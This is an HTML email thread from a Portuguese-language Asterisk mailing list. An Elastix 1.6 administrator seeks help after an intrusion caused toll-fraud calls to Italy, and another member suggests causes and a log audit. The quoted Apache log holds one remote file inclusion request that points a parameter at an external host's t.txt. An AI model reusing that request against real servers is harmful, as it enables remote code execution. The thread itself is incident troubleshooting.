<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 10pt;
font-family:Tahoma
}
--></style>
</head>
<body class='hmmessage'>
Nielsen,<div><br></div><div>Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões.<br><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font class="ecxApple-style-span" face="Tahoma"><span class="ecxApple-style-span" style="font-size:12pt">Gleidison C. Sampaio</span></font></b></div><div><br></div><div><font class="Apple-style-span" color="#17365D"><br></font></div><br><hr id="stopSpelling">From: nielsen@freesolutions.com.br<br>Date: Mon, 22 Nov 2010 13:51:04 -0300<br>To: asteriskbrasil@listas.asteriskbrasil.org<br>Subject: Re: [AsteriskBrasil]        RES: Duvida ( SEGURANÇA ) Elastix 1.6<br><br>Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação.<br>
<br>Pensou nisso tudo ?<br><br>No final das contas é preciso a auditoria para identificar a origem da invasão.<br><br><div class="ecxgmail_quote">Em 22 de novembro de 2010 13:40, Gleidison Sampaio <span dir="ltr"><<a href="mailto:gleidison.sampaio@hotmail.com">gleidison.sampaio@hotmail.com</a>></span> escreveu:<br>
<blockquote class="ecxgmail_quote" style="padding-left:1ex">
<div>
Sim no Elastix 1.6<div><br><div>ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar.</div>
<div><br></div><div><span style="font-family:verdana,arial,helvetica,sans-serif;font-size:12pt"><table style="font-size:8pt" align="center" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr style="background-color:rgb(255, 255, 255)"></tr><tr style="background-color:rgb(255, 255, 255)"><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td></tr><tr style="background-color:rgb(255, 255, 255)">
<td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">2010-11-21 21:14:01</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
XXXX</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">00393396976261</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
SIP/TRUNK</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"> </td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
SIP/TRUNK</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">ANSWERED</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
1045</td></tr><tr style="background-color:rgb(255, 255, 255)"><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
</td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px"><br></td><td style="font-family:verdana,arial,helvetica,sans-serif;color:rgb(0, 0, 0);font-size:8pt;padding:4px">
<br><br></td></tr></tbody></table></span><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size:12pt">Gleidison C. Sampaio</span></font></b></div><div><br></div>
<br><br><br><br><hr>From: <a href="mailto:nielsen@freesolutions.com.br">nielsen@freesolutions.com.br</a><br>Date: Mon, 22 Nov 2010 13:27:16 -0300<div class="ecxim"><br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org">asteriskbrasil@listas.asteriskbrasil.org</a><br>
</div>Subject: Re: [AsteriskBrasil]        RES: Duvida ( SEGURANÇA ) Elastix 1.6<div><div></div><div class="h5"><br><br>Opa, foi no seu ELASTIX 1.6?<br><br>Qual a posição que se encontra seu servidor voip na sua rede ?<br><br><div>
Em 22 de novembro de 2010 13:20, Gleidison Sampaio <span dir="ltr"><<a href="mailto:gleidison.sampaio@hotmail.com">gleidison.sampaio@hotmail.com</a>></span> escreveu:<br>
<blockquote style="padding-left:1ex">
<div>
Sidinei,<div><br></div><div>Obrigado pela Resposta, </div><div><br></div><div>cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso.</div>
<div><br></div><div>/var/log/httpd/access_log</div><div><br></div><div><div>72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"</div>
<div>72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=<a href="http://88.255.225.20/appserv/t.txt" target="_blank">http://88.255.225.20/appserv/t.txt</a>? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"</div>
<div><br></div><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size:12pt">Gleidison C. Sampaio</span></font></b></div><div><br></div><div><font color="#17365d"><br>
</font></div><br><br><br><br><hr>From: <a href="mailto:sidnei_rp@ig.com.br">sidnei_rp@ig.com.br</a><br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org">asteriskbrasil@listas.asteriskbrasil.org</a><br>
Date: Mon, 22 Nov 2010 14:00:10 -0200<br>Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6<br><br>
<div><span style="font-size:11pt;color:rgb(31, 73, 125)">Não, pois estão todas as linhas comentadas (é só um exemplo). </span><br><span style="font-size:11pt;color:rgb(31, 73, 125)"> </span><br><div><div style="border-width:1pt medium medium;border-style:solid none none;border-color:rgb(181, 196, 223) -moz-use-text-color -moz-use-text-color;padding:3pt 0cm 0cm">
<b><span style="font-size:10pt">De:</span></b><span style="font-size:10pt"> <a href="mailto:asteriskbrasil-bounces@listas.asteriskbrasil.org">asteriskbrasil-bounces@listas.asteriskbrasil.org</a> [mailto:<a href="mailto:asteriskbrasil-bounces@listas.asteriskbrasil.org">asteriskbrasil-bounces@listas.asteriskbrasil.org</a>] <b>Em nome de </b>Gleidison Sampaio<br>
<b>Enviada em:</b> segunda-feira, 22 de novembro de 2010 13:40<br><b>Para:</b> Asterisk Lista<br><b>Assunto:</b> [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6</span><br></div></div> <br><span style="font-size:10pt">Boa tarde Lista!</span><br>
<div><span style="font-size:10pt"> </span><br></div><div><span style="font-size:10pt">hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor</span><br>
</div><div><span style="font-size:10pt"> </span><br></div><div><span style="font-size:10pt">/etc/asterisk/users.conf</span><br></div><div><span style="font-size:10pt"> </span><br></div><div><div><span style="font-size:10pt">;[6000]</span><br>
</div><div><span style="font-size:10pt">;fullname = Joe User</span><br></div><div><span style="font-size:10pt">;email = joe@foo.bar</span><br></div><div><span style="font-size:10pt">;secret = xxxx</span><br>
</div><div><span style="font-size:10pt">;zapchan = 1</span><br></div><div><span style="font-size:10pt">;hasvoicemail = yes</span><br></div><div><span style="font-size:10pt">;vmsecret = xxxx</span><br></div>
<div><span style="font-size:10pt">;hassip = yes</span><br></div><div><span style="font-size:10pt">;hasiax = no</span><br></div><div><span style="font-size:10pt">;hash323 = no</span><br></div><div><span style="font-size:10pt">;hasmanager = no</span><br>
</div><div><span style="font-size:10pt">;callwaiting = no</span><br></div><div><span style="font-size:10pt">;context = international</span><br></div><div><span style="font-size:10pt"> </span><br></div><span style="font-size:10pt"> </span><br>
<div><span style="font-size:10pt"> </span><br></div><div><span style="font-size:10pt"> </span><br></div><div><span style="font-size:10pt">Att;</span><br></div><div><span style="font-size:10pt"> </span><br>
</div><div><span><b><span>Gleidison C. Sampaio</span></b></span><span style="font-size:10pt"></span><br></div><div><span style="font-size:10pt"> </span><br></div><div><span style="font-size:10pt"> </span><br>
</div></div></div><br><br></div></div></blockquote></div></div></div></div></div>                                            </div>
<br><br></blockquote></div></div>                                            </body>
</html>